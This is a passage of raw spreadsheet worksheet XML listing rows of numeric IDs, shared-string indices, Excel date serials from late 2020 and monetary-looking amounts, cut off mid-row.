    <row r="2334" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2334">
        <v>21994</v>
      </c>
      <c r="B2334">
        <v>4887</v>
      </c>
      <c r="C2334" t="s">
        <v>7481</v>
      </c>
      <c r="D2334" t="s">
        <v>11749</v>
      </c>
      <c r="E2334">
        <v>4</v>
      </c>
      <c r="F2334" t="s">
        <v>5434</v>
      </c>
      <c r="G2334" s="1">
        <v>44074</v>
      </c>
      <c r="H2334">
        <v>1800</v>
      </c>
      <c r="I2334" t="s">
        <v>11751</v>
      </c>
      <c r="J2334" t="s">
        <v>10492</v>
      </c>
    </row>
    <row r="2335" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2335">
        <v>21995</v>
      </c>
      <c r="B2335">
        <v>1102</v>
      </c>
      <c r="C2335" t="s">
        <v>3402</v>
      </c>
      <c r="D2335" t="s">
        <v>11757</v>
      </c>
      <c r="E2335">
        <v>14</v>
      </c>
      <c r="F2335" t="s">
        <v>11758</v>
      </c>
      <c r="G2335" s="1">
        <v>44172</v>
      </c>
      <c r="H2335">
        <v>500000</v>
      </c>
      <c r="I2335" t="s">
        <v>11759</v>
      </c>
    </row>
    <row r="2336" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2336">
        <v>21996</v>
      </c>
      <c r="B2336">
        <v>1102</v>
      </c>
      <c r="C2336" t="s">
        <v>3402</v>
      </c>
      <c r="D2336" t="s">
        <v>11757</v>
      </c>
      <c r="E2336">
        <v>14</v>
      </c>
      <c r="F2336" t="s">
        <v>11760</v>
      </c>
      <c r="G2336" s="1">
        <v>44172</v>
      </c>
      <c r="H2336">
        <v>20000</v>
      </c>
      <c r="I2336" t="s">
        <v>11759</v>
      </c>
    </row>
    <row r="2337" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2337">
        <v>21997</v>
      </c>
      <c r="B2337">
        <v>1102</v>
      </c>
      <c r="C2337" t="s">
        <v>3402</v>
      </c>
      <c r="D2337" t="s">
        <v>11757</v>
      </c>
      <c r="E2337">
        <v>14</v>
      </c>
      <c r="F2337" t="s">
        <v>7241</v>
      </c>
      <c r="G2337" s="1">
        <v>44172</v>
      </c>
      <c r="H2337">
        <v>100000</v>
      </c>
      <c r="I2337" t="s">
        <v>11761</v>
      </c>
    </row>
    <row r="2338" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2338">
        <v>21998</v>
      </c>
      <c r="B2338">
        <v>4866</v>
      </c>
      <c r="C2338" t="s">
        <v>7489</v>
      </c>
      <c r="D2338" t="s">
        <v>11762</v>
      </c>
      <c r="E2338">
        <v>2</v>
      </c>
      <c r="F2338" t="s">
        <v>7057</v>
      </c>
      <c r="G2338" s="1">
        <v>44110</v>
      </c>
      <c r="H2338">
        <v>100000</v>
      </c>
      <c r="J2338" t="s">
        <v>10582</v>
      </c>
    </row>
    <row r="2339" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2339">
        <v>21999</v>
      </c>
      <c r="B2339">
        <v>4866</v>
      </c>
      <c r="C2339" t="s">
        <v>7489</v>
      </c>
      <c r="D2339" t="s">
        <v>11762</v>
      </c>
      <c r="E2339">
        <v>2</v>
      </c>
      <c r="F2339" t="s">
        <v>9472</v>
      </c>
      <c r="G2339" s="1">
        <v>44110</v>
      </c>
      <c r="H2339">
        <v>20000</v>
      </c>
      <c r="J2339" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2340" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2340">
        <v>22000</v>
      </c>
      <c r="B2340">
        <v>4888</v>
      </c>
      <c r="C2340" t="s">
        <v>7473</v>
      </c>
      <c r="D2340" t="s">
        <v>11763</v>
      </c>
      <c r="E2340">
        <v>2</v>
      </c>
      <c r="F2340" t="s">
        <v>7057</v>
      </c>
      <c r="G2340" s="1">
        <v>44210</v>
      </c>
      <c r="H2340">
        <v>100000</v>
      </c>
      <c r="J2340" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2341" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2341">
        <v>22001</v>
      </c>
      <c r="B2341">
        <v>4888</v>
      </c>
      <c r="C2341" t="s">
        <v>7473</v>
      </c>
      <c r="D2341" t="s">
        <v>11763</v>
      </c>
      <c r="E2341">
        <v>2</v>
      </c>
      <c r="F2341" t="s">
        <v>9648</v>
      </c>
      <c r="G2341" s="1">
        <v>44210</v>
      </c>
      <c r="H2341">
        <v>20000</v>
      </c>
      <c r="J2341" t="s">
        <v>9509</v>
      </c>
    </row>
    <row r="2342" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2342">
        <v>22019</v>
      </c>
      <c r="B2342">
        <v>4805</v>
      </c>
      <c r="C2342" t="s">
        <v>7512</v>
      </c>
      <c r="D2342" t="s">
        <v>11764</v>
      </c>
      <c r="E2342">
        <v>18</v>
      </c>
      <c r="F2342" t="s">
        <v>7514</v>
      </c>
      <c r="G2342" s="1">
        <v>44126</v>
      </c>
      <c r="H2342">
        <v>7704</v>
      </c>
      <c r="I2342" t="s">
        <v>11765</v>
      </c>
    </row>
    <row r="2343" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2343">
        <v>22020</v>
      </c>
      <c r="B2343">
        <v>2337</v>
      </c>
      <c r="C2343" t="s">
        <v>5129</v>
      </c>
      <c r="D2343" t="s">
        <v>10053</v>
      </c>
      <c r="E2343">
        <v>12</v>
      </c>
      <c r="F2343" t="s">
        <v>9523</v>
      </c>
      <c r="G2343" s="1">
        <v>44081</v>
      </c>
      <c r="H2343">
        <v>10000</v>
      </c>
      <c r="J2343" t="s">
        <v>10437</v>
      </c>
    </row>
    <row r="2344" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2344">
        <v>22021</v>
      </c>
      <c r="B2344">
        <v>873</v>
      </c>
      <c r="C2344" t="s">
        <v>2904</v>
      </c>
      <c r="D2344" t="s">
        <v>10592</v>
      </c>
      <c r="E2344">
        <v>13</v>
      </c>
      <c r="F2344" t="s">
        <v>4037</v>
      </c>
      <c r="G2344" s="1">
        <v>44081</v>
      </c>
      <c r="H2344">
        <v>350000</v>
      </c>
      <c r="I2344" t="s">
        <v>11446</v>
      </c>
      <c r="J2344" t="s">
        <v>11161</v>
      </c>
    </row>
    <row r="2345" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2345">
        <v>22031</v>
      </c>
      <c r="B2345">
        <v>2522</v>
      </c>
      <c r="C2345" t="s">
        <v>4763</v>
      </c>
      <c r="D2345" t="s">
        <v>9853</v>
      </c>
      <c r="E2345">
        <v>29</v>
      </c>
      <c r="F2345" t="s">
        <v>11766</v>
      </c>
      <c r="G2345" s="1">
        <v>44106</v>
      </c>
      <c r="H2345">
        <v>350000</v>
      </c>
      <c r="I2345" t="s">
        <v>11767</v>
      </c>
      <c r="J2345" t="s">
        <v>11768</v>
      </c>
    </row>
    <row r="2346" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2346">
        <v>22033</v>
      </c>
      <c r="B2346">
        <v>4820</v>
      </c>
      <c r="C2346" t="s">
        <v>7423</v>
      </c>
      <c r="D2346" t="s">
        <v>11769</v>
      </c>
      <c r="E2346">
        <v>12</v>
      </c>
      <c r="F2346" t="s">
        <v>11770</v>
      </c>
      <c r="G2346" s="1">
        <v>44103</v>
      </c>
      <c r="H2346">
        <v>15000</v>
      </c>
    </row>
    <row r="2347" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2347">
        <v>22034</v>
      </c>
      <c r="B2347">
        <v>4820</v>
      </c>
      <c r="C2347" t="s">
        <v>7423</v>
      </c>
      <c r="D2347" t="s">
        <v>11769</v>
      </c>
      <c r="E2347">
        <v>12</v>
      </c>
      <c r="F2347" t="s">
        <v>9435</v>
      </c>
      <c r="G2347" s="1">
        <v>44103</v>
      </c>
      <c r="H2347">
        <v>15000</v>
      </c>
    </row>
    <row r="2348" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2348">
        <v>22035</v>
      </c>
      <c r="B2348">
        <v>4820</v>
      </c>
      <c r="C2348" t="s">
        <v>7423</v>
      </c>
      <c r="D2348" t="s">
        <v>11769</v>
      </c>
      <c r="E2348">
        <v>12</v>
      </c>
      <c r="F2348" t="s">
        <v>11771</v>
      </c>
      <c r="G2348" s="1">
        <v>44103</v>
      </c>
      <c r="H2348">
        <v>10000</v>
      </c>
    </row>
    <row r="2349" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2349">
        <v>22036</v>
      </c>
      <c r="B2349">
        <v>4820</v>
      </c>
      <c r="C2349" t="s">
        <v>7423</v>
      </c>
      <c r="D2349" t="s">
        <v>11769</v>
      </c>
      <c r="E2349">
        <v>12</v>
      </c>
      <c r="F2349" t="s">
        <v>9595</v>
      </c>
      <c r="G2349" s="1">
        <v>44103</v>
      </c>
      <c r="H2349">
        <v>15000</v>
      </c>
    </row>
    <row r="2350" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2350">
        <v>22037</v>
      </c>
      <c r="B2350">
        <v>4820</v>
      </c>
      <c r="C2350" t="s">
        <v>7423</v>
      </c>
      <c r="D2350" t="s">
        <v>11769</v>
      </c>
      <c r="E2350">
        <v>12</v>
      </c>
      <c r="F2350" t="s">
        <v>1746</v>
      </c>
      <c r="G2350" s="1">
        <v>44103</v>
      </c>
      <c r="H2350">
        <v>15000</v>
      </c>
    </row>
    <row r="2351" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2351">
        <v>22038</v>
      </c>
      <c r="B2351">
        <v>4820</v>
      </c>
      <c r="C2351" t="s">
        <v>7423</v>
      </c>
      <c r="D2351" t="s">
        <v>11769</v>
      </c>
      <c r="E2351">
        <v>12</v>
      </c>
      <c r="F2351" t="s">
        <v>10062</v>
      </c>
      <c r="G2351" s="1">
        <v>44103</v>
      </c>
      <c r="H2351">
        <v>15000</v>
      </c>
    </row>
    <row r="2352" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2352">
        <v>22040</v>
      </c>
      <c r="B2352">
        <v>4820</v>
      </c>
      <c r="C2352" t="s">
        <v>7423</v>
      </c>
      <c r="D2352" t="s">
        <v>11769</v>
      </c>
      <c r="E2352">
        <v>12</v>
      </c>
      <c r="F2352" t="s">
        <v>9438</v>
      </c>
      <c r="G2352" s="1">
        <v>44103</v>
      </c>
      <c r="H2352">
        <v>15000</v>
      </c>
    </row>
    <row r="2353" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2353">
        <v>22042</v>
      </c>
      <c r="B2353">
        <v>4820</v>
      </c>
      <c r="C2353" t="s">
        <v>7423</v>
      </c>
      <c r="D2353" t="s">
        <v>11769</v>
      </c>
      <c r="E2353">
        <v>12</v>
      </c>
      <c r="F2353" t="s">
        <v>11772</v>
      </c>
      <c r="G2353" s="1">
        <v>44103</v>
      </c>
      <c r="H2353">
        <v>7000</v>
      </c>
    </row>
    <row r="2354" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2354">
        <v>22043</v>
      </c>
      <c r="B2354">
        <v>4820</v>
      </c>
      <c r="C2354" t="s">
        <v>7423</v>
      </c>
      <c r="D2354" t="s">
        <v>11769</v>
      </c>
      <c r="E2354">
        <v>12</v>
      </c>
      <c r="F2354" t="s">
        <v>9561</v>
      </c>
      <c r="G2354" s="1">
        <v>44103</v>
      </c>
      <c r="H2354">
        <v>8000</v>
      </c>
    </row>
    <row r="2355" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2355">
        <v>22045</v>
      </c>
      <c r="B2355">
        <v>2608</v>
      </c>
      <c r="C2355" t="s">
        <v>5292</v>
      </c>
      <c r="D2355" t="s">
        <v>10088</v>
      </c>
      <c r="E2355">
        <v>2</v>
      </c>
      <c r="F2355" t="s">
        <v>11773</v>
      </c>
      <c r="G2355" s="1">
        <v>44081</v>
      </c>
      <c r="H2355">
        <v>0</v>
      </c>
      <c r="J2355" t="s">
        <v>11774</v>
      </c>
    </row>
    <row r="2356" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2356">
        <v>22046</v>
      </c>
      <c r="B2356">
        <v>4831</v>
      </c>
      <c r="C2356" t="s">
        <v>7465</v>
      </c>
      <c r="D2356" t="s">
        <v>11775</v>
      </c>
      <c r="E2356">
        <v>16</v>
      </c>
      <c r="F2356" t="s">
        <v>2236</v>
      </c>
      <c r="G2356" s="1">
        <v>44106</v>
      </c>
      <c r="H2356">
        <v>1000</v>
      </c>
      <c r="I2356" t="s">
        <v>9738</v>
      </c>
    </row>
    <row r="2357" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2357">
        <v>22047</v>
      </c>
      <c r="B2357">
        <v>4831</v>
      </c>
      <c r="C2357" t="s">
        <v>7465</v>
      </c>
      <c r="D2357" t="s">
        <v>11775</v>
      </c>
      <c r="E2357">
        <v>16</v>
      </c>
      <c r="F2357" t="s">
        <v>11016</v>
      </c>
      <c r="G2357" s="1">
        <v>44106</v>
      </c>
      <c r="H2357">
        <v>1000</v>
      </c>
      <c r="I2357" t="s">
        <v>9738</v>
      </c>
    </row>
    <row r="2358" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2358">
        <v>22048</v>
      </c>
      <c r="B2358">
        <v>2676</v>
      </c>
      <c r="C2358" t="s">
        <v>5653</v>
      </c>
      <c r="D2358" t="s">
        <v>10521</v>
      </c>
      <c r="E2358">
        <v>17</v>
      </c>
      <c r="F2358" t="s">
        <v>9546</v>
      </c>
      <c r="G2358" s="1">
        <v>44071</v>
      </c>
      <c r="H2358">
        <v>0</v>
      </c>
      <c r="J2358" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="2359" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2359">
        <v>22049</v>
      </c>
      <c r="B2359">
        <v>276</v>
      </c>
      <c r="C2359" t="s">
        <v>1752</v>
      </c>
      <c r="D2359" t="s">
        <v>11776</v>
      </c>
      <c r="E2359">
        <v>16</v>
      </c>
      <c r="F2359" t="s">
        <v>547</v>
      </c>
      <c r="G2359" s="1">
        <v>44118</v>
      </c>
      <c r="H2359">
        <v>150000</v>
      </c>
      <c r="J2359" t="s">
        <v>10774</v>
      </c>
    </row>
    <row r="2360" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2360">
        <v>22050</v>
      </c>
      <c r="B2360">
        <v>4830</v>
      </c>
      <c r="C2360" t="s">
        <v>7386</v>
      </c>
      <c r="D2360" t="s">
        <v>11777</v>
      </c>
      <c r="E2360">
        <v>11</v>
      </c>
      <c r="F2360" t="s">
        <v>3242</v>
      </c>
      <c r="G2360" s="1">
        <v>44099</v>
      </c>
      <c r="H2360">
        <v>12000</v>
      </c>
      <c r="I2360" t="s">
        <v>11778</v>
      </c>
    </row>
    <row r="2361" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2361">
        <v>22051</v>
      </c>
      <c r="B2361">
        <v>4876</v>
      </c>
      <c r="C2361" t="s">
        <v>7408</v>
      </c>
      <c r="D2361" t="s">
        <v>11779</v>
      </c>
      <c r="E2361">
        <v>16</v>
      </c>
      <c r="F2361" t="s">
        <v>11780</v>
      </c>
      <c r="G2361" s="1">
        <v>44116</v>
      </c>
      <c r="H2361">
        <v>200</v>
      </c>
      <c r="I2361" t="s">
        <v>11781</v>
      </c>
    </row>
    <row r="2362" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2362">
        <v>22052</v>
      </c>
      <c r="B2362">
        <v>738</v>
      </c>
      <c r="C2362" t="s">
        <v>1461</v>
      </c>
      <c r="D2362" t="s">
        <v>11782</v>
      </c>
      <c r="E2362">
        <v>17</v>
      </c>
      <c r="F2362" t="s">
        <v>11783</v>
      </c>
      <c r="G2362" s="1">
        <v>44081</v>
      </c>
      <c r="H2362">
        <v>250000</v>
      </c>
      <c r="I2362" t="s">
        <v>11784</v>
      </c>
      <c r="J2362" t="s">
        <v>11785</v>
      </c>
    </row>
    <row r="2363" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2363">
        <v>22053</v>
      </c>
      <c r="B2363">
        <v>4876</v>
      </c>
      <c r="C2363" t="s">
        <v>7408</v>
      </c>
      <c r="D2363" t="s">
        <v>11779</v>
      </c>
      <c r="E2363">
        <v>16</v>
      </c>
      <c r="F2363" t="s">
        <v>11786</v>
      </c>
      <c r="G2363" s="1">
        <v>44116</v>
      </c>
      <c r="H2363">
        <v>100</v>
      </c>
      <c r="I2363" t="s">
        <v>11781</v>
      </c>
    </row>
    <row r="2364" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2364">
        <v>22054</v>
      </c>
      <c r="B2364">
        <v>4876</v>
      </c>
      <c r="C2364" t="s">
        <v>7408</v>
      </c>
      <c r="D2364" t="s">
        <v>11779</v>
      </c>
      <c r="E2364">
        <v>16</v>
      </c>
      <c r="F2364" t="s">
        <v>1746</v>
      </c>
      <c r="G2364" s="1">
        <v>44116</v>
      </c>
      <c r="H2364">
        <v>15</v>
      </c>
      <c r="I2364" t="s">
        <v>9693</v>
      </c>
    </row>
    <row r="2365" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2365">
        <v>22055</v>
      </c>
      <c r="B2365">
        <v>4908</v>
      </c>
      <c r="C2365" t="s">
        <v>7504</v>
      </c>
      <c r="D2365" t="s">
        <v>11787</v>
      </c>
      <c r="E2365">
        <v>24</v>
      </c>
      <c r="F2365" t="s">
        <v>609</v>
      </c>
      <c r="G2365" s="1">
        <v>44109</v>
      </c>
      <c r="H2365">
        <v>900000</v>
      </c>
    </row>
    <row r="2366" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2366">
        <v>22056</v>
      </c>
      <c r="B2366">
        <v>4885</v>
      </c>
      <c r="C2366" t="s">
        <v>7430</v>
      </c>
      <c r="D2366" t="s">
        <v>11788</v>
      </c>
      <c r="E2366">
        <v>19</v>
      </c>
      <c r="F2366" t="s">
        <v>11789</v>
      </c>
      <c r="G2366" s="1">
        <v>44110</v>
      </c>
      <c r="H2366">
        <v>50000</v>
      </c>
      <c r="I2366" t="s">
        <v>11790</v>
      </c>
      <c r="J2366" t="s">
        <v>11791</v>
      </c>
    </row>
    <row r="2367" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2367">
        <v>22057</v>
      </c>
      <c r="B2367">
        <v>4885</v>
      </c>
      <c r="C2367" t="s">
        <v>7430</v>
      </c>
      <c r="D2367" t="s">
        <v>11788</v>
      </c>
      <c r="E2367">
        <v>19</v>
      </c>
      <c r="F2367" t="s">
        <v>9590</v>
      </c>
      <c r="G2367" s="1">
        <v>44110</v>
      </c>
      <c r="H2367">
        <v>10000</v>
      </c>
      <c r="I2367" t="s">
        <v>11790</v>
      </c>
      <c r="J2367" t="s">
        <v>11791</v>
      </c>
    </row>
    <row r="2368" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2368">
        <v>22058</v>
      </c>
      <c r="B2368">
        <v>4885</v>
      </c>
      <c r="C2368" t="s">
        <v>7430</v>
      </c>
      <c r="D2368" t="s">
        <v>11788</v>
      </c>
      <c r="E2368">
        <v>19</v>
      </c>
      <c r="F2368" t="s">
        <v>4686</v>
      </c>
      <c r="G2368" s="1">
        <v>44110</v>
      </c>
      <c r="H2368">
        <v>5000</v>
      </c>
      <c r="I2368" t="s">
        <v>11790</v>
      </c>
      <c r="J2368" t="s">
        <v>11791</v>
      </c>
    </row>
    <row r="2369" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2369">
        <v>22059</v>
      </c>
      <c r="B2369">
        <v>4885</v>
      </c>
      <c r="C2369" t="s">
        <v>7430</v>
      </c>
      <c r="D2369" t="s">
        <v>11788</v>
      </c>
      <c r="E2369">
        <v>19</v>
      </c>
      <c r="F2369" t="s">
        <v>10833</v>
      </c>
      <c r="G2369" s="1">
        <v>44110</v>
      </c>
      <c r="H2369">
        <v>5000</v>
      </c>
      <c r="I2369" t="s">
        <v>11792</v>
      </c>
      <c r="J2369" t="s">
        <v>11791</v>
      </c>
    </row>
    <row r="2370" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2370">
        <v>22062</v>
      </c>
      <c r="B2370">
        <v>4885</v>
      </c>
      <c r="C2370" t="s">
        <v>7430</v>
      </c>
      <c r="D2370" t="s">
        <v>11788</v>
      </c>
      <c r="E2370">
        <v>19</v>
      </c>
      <c r="F2370" t="s">
        <v>10832</v>
      </c>
      <c r="G2370" s="1">
        <v>44110</v>
      </c>
      <c r="H2370">
        <v>5000</v>
      </c>
      <c r="I2370" t="s">
        <v>11790</v>
      </c>
      <c r="J2370" t="s">
        <v>11791</v>
      </c>
    </row>
    <row r="2371" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2371">
        <v>22063</v>
      </c>
      <c r="B2371">
        <v>4885</v>
      </c>
      <c r="C2371" t="s">
        <v>7430</v>
      </c>
      <c r="D2371" t="s">
        <v>11788</v>
      </c>
      <c r="E2371">
        <v>19</v>
      </c>
      <c r="F2371" t="s">
        <v>11793</v>
      </c>
      <c r="G2371" s="1">
        <v>44110</v>
      </c>
      <c r="H2371">
        <v>5000</v>
      </c>
      <c r="I2371" t="s">
        <v>11792</v>
      </c>
      <c r="J2371" t="s">
        <v>11791</v>
      </c>
    </row>
    <row r="2372" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2372">
        <v>22064</v>
      </c>
      <c r="B2372">
        <v>4885</v>
      </c>
      <c r="C2372" t="s">
        <v>7430</v>
      </c>
      <c r="D2372" t="s">
        <v>11788</v>
      </c>
      <c r="E2372">
        <v>19</v>
      </c>
      <c r="F2372" t="s">
        <v>9578</v>
      </c>
      <c r="G2372" s="1">
        <v>44110</v>
      </c>
      <c r="H2372">
        <v>10000</v>
      </c>
      <c r="I2372" t="s">
        <v>10892</v>
      </c>
      <c r="J2372" t="s">
        <v>11791</v>
      </c>
    </row>
    <row r="2373" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2373">
        <v>22065</v>
      </c>
      <c r="B2373">
        <v>1051</v>
      </c>
      <c r="C2373" t="s">
        <v>3288</v>
      </c>
      <c r="D2373" t="s">
        <v>11794</v>
      </c>
      <c r="E2373">
        <v>29</v>
      </c>
      <c r="F2373" t="s">
        <v>11795</v>
      </c>
      <c r="G2373" s="1">
        <v>44103</v>
      </c>
      <c r="H2373">
        <v>100000</v>
      </c>
      <c r="I2373" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="2374" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2374">
        <v>22066</v>
      </c>
      <c r="B2374">
        <v>1051</v>
      </c>
      <c r="C2374" t="s">
        <v>3288</v>
      </c>
      <c r="D2374" t="s">
        <v>11794</v>
      </c>
      <c r="E2374">
        <v>29</v>
      </c>
      <c r="F2374" t="s">
        <v>9586</v>
      </c>
      <c r="G2374" s="1">
        <v>44103</v>
      </c>
      <c r="H2374">
        <v>1000</v>
      </c>
      <c r="I2374" t="s">
        <v>9536</v>
      </c>
      <c r="J2374" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="2375" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2375">
        <v>22067</v>
      </c>
      <c r="B2375">
        <v>1051</v>
      </c>
      <c r="C2375" t="s">
        <v>3288</v>
      </c>
      <c r="D2375" t="s">
        <v>11794</v>
      </c>
      <c r="E2375">
        <v>29</v>
      </c>
      <c r="F2375" t="s">
        <v>9610</v>
      </c>
      <c r="G2375" s="1">
        <v>44103</v>
      </c>
      <c r="H2375">
        <v>1000</v>
      </c>
      <c r="I2375" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="2376" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2376">
        <v>22068</v>
      </c>
      <c r="B2376">
        <v>1051</v>
      </c>
      <c r="C2376" t="s">
        <v>3288</v>
      </c>
      <c r="D2376" t="s">
        <v>11794</v>
      </c>
      <c r="E2376">
        <v>29</v>
      </c>
      <c r="F2376" t="s">
        <v>609</v>
      </c>
      <c r="G2376" s="1">
        <v>44103</v>
      </c>
      <c r="H2376">
        <v>1000</v>
      </c>
      <c r="I2376" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="2377" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2377">
        <v>22069</v>
      </c>
      <c r="B2377">
        <v>1052</v>
      </c>
      <c r="C2377" t="s">
        <v>3280</v>
      </c>
      <c r="D2377" t="s">
        <v>11742</v>
      </c>
      <c r="E2377">
        <v>29</v>
      </c>
      <c r="F2377" t="s">
        <v>2236</v>
      </c>
      <c r="G2377" s="1">
        <v>44139</v>
      </c>
      <c r="H2377">
        <v>1000</v>
      </c>
      <c r="I2377" t="s">
        <v>11743</v>
      </c>
      <c r="J2377" t="s">
        <v>10325</v>
      </c>
    </row>
    <row r="2378" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2378">
        <v>22070</v>
      </c>
      <c r="B2378">
        <v>1211</v>
      </c>
      <c r="C2378" t="s">
        <v>3422</v>
      </c>
      <c r="D2378" t="s">
        <v>11796</v>
      </c>
      <c r="E2378">
        <v>2</v>
      </c>
      <c r="F2378" t="s">
        <v>1746</v>
      </c>
      <c r="G2378" s="1">
        <v>44110</v>
      </c>
      <c r="H2378">
        <v>100000</v>
      </c>
      <c r="J2378" t="s">
        <v>11797</v>
      </c>
    </row>
    <row r="2379" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2379">
        <v>22071</v>
      </c>
      <c r="B2379">
        <v>1211</v>
      </c>
      <c r="C2379" t="s">
        <v>3422</v>
      </c>
      <c r="D2379" t="s">
        <v>11796</v>
      </c>
      <c r="E2379">
        <v>2</v>
      </c>
      <c r="F2379" t="s">
        <v>9470</v>
      </c>
      <c r="G2379" s="1">
        <v>44110</v>
      </c>
      <c r="H2379">
        <v>100000</v>
      </c>
      <c r="J2379" t="s">
        <v>9572</v>
      </c>
    </row>
    <row r="2380" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2380">
        <v>22072</v>
      </c>
      <c r="B2380">
        <v>1211</v>
      </c>
      <c r="C2380" t="s">
        <v>3422</v>
      </c>
      <c r="D2380" t="s">
        <v>11796</v>
      </c>
      <c r="E2380">
        <v>2</v>
      </c>
      <c r="F2380" t="s">
        <v>11798</v>
      </c>
      <c r="G2380" s="1">
        <v>44110</v>
      </c>
      <c r="H2380">
        <v>100000</v>
      </c>
      <c r="J2380" t="s">
        <v>11797</v>
      </c>
    </row>
    <row r="2381" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2381">
        <v>22073</v>
      </c>
      <c r="B2381">
        <v>1211</v>
      </c>
      <c r="C2381" t="s">
        <v>3422</v>
      </c>
      <c r="D2381" t="s">
        <v>11796</v>
      </c>
      <c r="E2381">
        <v>2</v>
      </c>
      <c r="F2381" t="s">
        <v>9437</v>
      </c>
      <c r="G2381" s="1">
        <v>44110</v>
      </c>
      <c r="H2381">
        <v>50000</v>
      </c>
      <c r="J2381" t="s">
        <v>11797</v>
      </c>
    </row>
    <row r="2382" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2382">
        <v>22074</v>
      </c>
      <c r="B2382">
        <v>1211</v>
      </c>
      <c r="C2382" t="s">
        <v>3422</v>
      </c>
      <c r="D2382" t="s">
        <v>11796</v>
      </c>
      <c r="E2382">
        <v>2</v>
      </c>
      <c r="F2382" t="s">
        <v>9595</v>
      </c>
      <c r="G2382" s="1">
        <v>44110</v>
      </c>
      <c r="H2382">
        <v>20000</v>
      </c>
      <c r="J2382" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2383" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2383">
        <v>22075</v>
      </c>
      <c r="B2383">
        <v>1211</v>
      </c>
      <c r="C2383" t="s">
        <v>3422</v>
      </c>
      <c r="D2383" t="s">
        <v>11796</v>
      </c>
      <c r="E2383">
        <v>2</v>
      </c>
      <c r="F2383" t="s">
        <v>9435</v>
      </c>
      <c r="G2383" s="1">
        <v>44110</v>
      </c>
      <c r="H2383">
        <v>20000</v>
      </c>
      <c r="J2383" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2384" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2384">
        <v>22076</v>
      </c>
      <c r="B2384">
        <v>1663</v>
      </c>
      <c r="C2384" t="s">
        <v>16428</v>
      </c>
      <c r="D2384" t="s">
        <v>16429</v>
      </c>
      <c r="E2384">
        <v>31</v>
      </c>
      <c r="F2384" t="s">
        <v>11800</v>
      </c>
      <c r="G2384" s="1">
        <v>44096</v>
      </c>
      <c r="H2384" s="4">
        <v>60000</v>
      </c>
      <c r="I2384" t="s">
        <v>9536</v>
      </c>
      <c r="J2384" t="s">
        <v>11801</v>
      </c>
    </row>
    <row r="2385" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2385">
        <v>22077</v>
      </c>
      <c r="B2385">
        <v>1663</v>
      </c>
      <c r="C2385" t="s">
        <v>16428</v>
      </c>
      <c r="D2385" t="s">
        <v>16429</v>
      </c>
      <c r="E2385">
        <v>31</v>
      </c>
      <c r="F2385" t="s">
        <v>2236</v>
      </c>
      <c r="G2385" s="1">
        <v>44096</v>
      </c>
      <c r="H2385" s="4">
        <v>360000</v>
      </c>
      <c r="I2385" t="s">
        <v>9536</v>
      </c>
      <c r="J2385" t="s">
        <v>11802</v>
      </c>
    </row>
    <row r="2386" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2386">
        <v>22079</v>
      </c>
      <c r="B2386">
        <v>2097</v>
      </c>
      <c r="C2386" t="s">
        <v>6070</v>
      </c>
      <c r="D2386" t="s">
        <v>11022</v>
      </c>
      <c r="E2386">
        <v>2</v>
      </c>
      <c r="F2386" t="s">
        <v>7057</v>
      </c>
      <c r="G2386" s="1">
        <v>44095</v>
      </c>
      <c r="H2386">
        <v>200000</v>
      </c>
      <c r="I2386" t="s">
        <v>9603</v>
      </c>
      <c r="J2386" t="s">
